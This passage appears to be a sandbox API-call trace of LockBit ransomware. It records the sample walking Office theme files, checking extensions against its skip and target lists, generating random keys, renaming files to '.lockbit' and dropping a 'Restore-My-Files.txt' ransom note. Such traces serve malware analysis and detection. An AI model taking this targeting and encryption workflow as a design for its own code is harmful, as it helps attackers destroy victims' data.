FileInformation=0x1fa2ed8, Length=0xc4, FileInformationClass=0xa) returned 0xc0000008 [0195.748] free (_Block=0x1fa2ed8) [0195.748] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Executive.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 1 [0195.748] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt") returned 86 [0195.748] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.748] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2927500, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x618565f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf2927500, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0xdb5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Flow.xml", cAlternateFileName="")) returned 1 [0195.748] lstrcmpiW (lpString1=".", lpString2="Flow.xml") returned -1 [0195.748] lstrcmpiW (lpString1="..", lpString2="Flow.xml") returned -1 [0195.748] PathFindExtensionW (pszPath="Flow.xml") returned=".xml" [0195.749] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0195.749] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0195.749] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0195.749] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0195.749] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0195.749] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0195.749] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0195.749] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0195.749] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0195.749] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0195.749] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0195.749] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0195.749] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0195.749] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0195.749] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0195.749] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0195.749] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0195.749] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0195.749] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0195.749] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0195.749] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0195.749] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0195.749] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0195.749] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0195.749] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.749] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0195.749] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0195.749] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0195.750] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0195.750] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0195.750] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0195.750] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0195.750] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0195.750] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0195.750] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0195.750] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0195.750] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0195.750] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0195.750] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0195.750] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0195.750] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0195.750] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0195.750] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.750] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0195.750] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0195.750] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0195.750] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0195.750] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Flow.xml") returned 1 [0195.750] lstrcmpiW (lpString1="ntldr", lpString2="Flow.xml") returned 1 [0195.750] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Flow.xml") returned 1 [0195.750] lstrcmpiW (lpString1="bootsect.bak", lpString2="Flow.xml") returned -1 [0195.750] lstrcmpiW (lpString1="autorun.inf", lpString2="Flow.xml") returned -1 [0195.750] lstrcmpiW (lpString1="thumbs.db", lpString2="Flow.xml") returned 1 [0195.750] lstrcmpiW (lpString1="iconcache.db", lpString2="Flow.xml") returned 1 [0195.750] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\") returned="" [0195.751] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Flow.xml") returned=".xml" [0195.751] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0195.751] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0195.751] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0195.751] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0195.751] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0195.751] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0195.751] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0195.751] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0195.751] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0195.751] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0195.751] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0195.751] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0195.751] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0195.751] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0195.751] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0195.751] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0195.751] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0195.751] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0195.751] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0195.751] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0195.751] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0195.751] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0195.751] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0195.751] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0195.751] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0195.751] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0195.752] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0195.752] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0195.752] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Flow.xml.lockbit") returned 82 [0195.752] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Flow.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\flow.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0195.753] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.753] malloc (_Size=0x40068) returned 0x3df0008 [0195.753] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3509) returned 1 [0195.753] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.754] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.754] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0195.754] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.755] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.755] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0195.755] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0195.759] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Flow.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Flow.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.759] malloc (_Size=0xba) returned 0x1fa2ed8 [0195.760] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xba, FileInformationClass=0xa) returned 0xc0000008 [0195.760] free (_Block=0x1fa2ed8) [0195.760] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Flow.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 1 [0195.760] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt") returned 86 [0195.760] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.760] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1614800, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x618565f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf1614800, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0xed4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Foundry.xml", cAlternateFileName="")) returned 1 [0195.760] lstrcmpiW (lpString1=".", lpString2="Foundry.xml") returned -1 [0195.760] lstrcmpiW (lpString1="..", lpString2="Foundry.xml") returned -1 [0195.760] PathFindExtensionW (pszPath="Foundry.xml") returned=".xml" [0195.760] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0195.760] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0195.760] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0195.760] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0195.760] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0195.760] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0195.760] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0195.760] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0195.760] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0195.760] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0195.760] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0195.760] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0195.760] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0195.761] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0195.761] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0195.761] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0195.761] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0195.761] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0195.761] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0195.761] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0195.761] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0195.761] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0195.761] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0195.761] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0195.761] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.761] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0195.761] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0195.761] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0195.761] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0195.761] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0195.761] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0195.761] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0195.761] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0195.761] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0195.761] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0195.761] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0195.761] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0195.761] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0195.762] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0195.762] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0195.762] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0195.762] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0195.762] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.762] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0195.762] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0195.762] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0195.762] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0195.762] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Foundry.xml") returned 1 [0195.762] lstrcmpiW (lpString1="ntldr", lpString2="Foundry.xml") returned 1 [0195.762] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Foundry.xml") returned 1 [0195.762] lstrcmpiW (lpString1="bootsect.bak", lpString2="Foundry.xml") returned -1 [0195.762] lstrcmpiW (lpString1="autorun.inf", lpString2="Foundry.xml") returned -1 [0195.762] lstrcmpiW (lpString1="thumbs.db", lpString2="Foundry.xml") returned 1 [0195.762] lstrcmpiW (lpString1="iconcache.db", lpString2="Foundry.xml") returned 1 [0195.762] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\") returned="" [0195.762] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Foundry.xml") returned=".xml" [0195.762] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0195.762] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0195.762] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0195.762] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0195.762] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0195.762] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0195.762] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0195.762] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0195.762] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0195.763] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0195.763] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0195.763] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0195.763] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0195.763] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0195.763] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0195.763] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0195.763] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0195.763] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0195.763] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0195.763] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0195.763] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0195.763] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0195.763] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0195.763] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0195.763] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0195.763] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0195.763] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0195.763] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0195.763] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Foundry.xml.lockbit") returned 85 [0195.763] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Foundry.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\foundry.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0195.766] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.766] malloc (_Size=0x40068) returned 0x3df0008 [0195.766] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3796) returned 1 [0195.766] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.766] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.766] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0195.766] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.767] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.767] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0195.767] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0195.773] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Foundry.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Foundry.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.773] malloc (_Size=0xc0) returned 0x1fa2ed8 [0195.773] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0xc0000008 [0195.773] free (_Block=0x1fa2ed8) [0195.773] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Foundry.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 1 [0195.773] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt") returned 86 [0195.773] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.773] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a54500, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x528a9ed0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5a54500, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0xe59, dwReserved0=0x0, dwReserved1=0x0, cFileName="Grid.xml", cAlternateFileName="")) returned 1 [0195.773] lstrcmpiW (lpString1=".", lpString2="Grid.xml") returned -1 [0195.773] lstrcmpiW (lpString1="..", lpString2="Grid.xml") returned -1 [0195.773] PathFindExtensionW (pszPath="Grid.xml") returned=".xml" [0195.773] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0195.774] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0195.774] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0195.774] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0195.774] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0195.774] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0195.774] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0195.774] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0195.774] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0195.774] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0195.774] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0195.774] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0195.774] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0195.774] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0195.774] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0195.774] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0195.774] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0195.774] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0195.774] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0195.774] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0195.774] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0195.774] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0195.774] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0195.774] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0195.774] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.774] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0195.774] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0195.774] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0195.774] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0195.775] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0195.775] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0195.775] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0195.775] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0195.775] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0195.775] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0195.775] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0195.775] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0195.775] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0195.775] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0195.775] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0195.775] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0195.775] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0195.775] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.775] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0195.775] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0195.775] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0195.775] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0195.775] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Grid.xml") returned 1 [0195.775] lstrcmpiW (lpString1="ntldr", lpString2="Grid.xml") returned 1 [0195.775] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Grid.xml") returned 1 [0195.775] lstrcmpiW (lpString1="bootsect.bak", lpString2="Grid.xml") returned -1 [0195.775] lstrcmpiW (lpString1="autorun.inf", lpString2="Grid.xml") returned -1 [0195.775] lstrcmpiW (lpString1="thumbs.db", lpString2="Grid.xml") returned 1 [0195.775] lstrcmpiW (lpString1="iconcache.db", lpString2="Grid.xml") returned 1 [0195.775] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\") returned="" [0195.776] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Grid.xml") returned=".xml" [0195.776] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0195.776] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0195.776] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0195.776] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0195.776] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0195.776] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0195.776] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0195.776] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0195.776] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0195.776] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0195.776] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0195.776] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 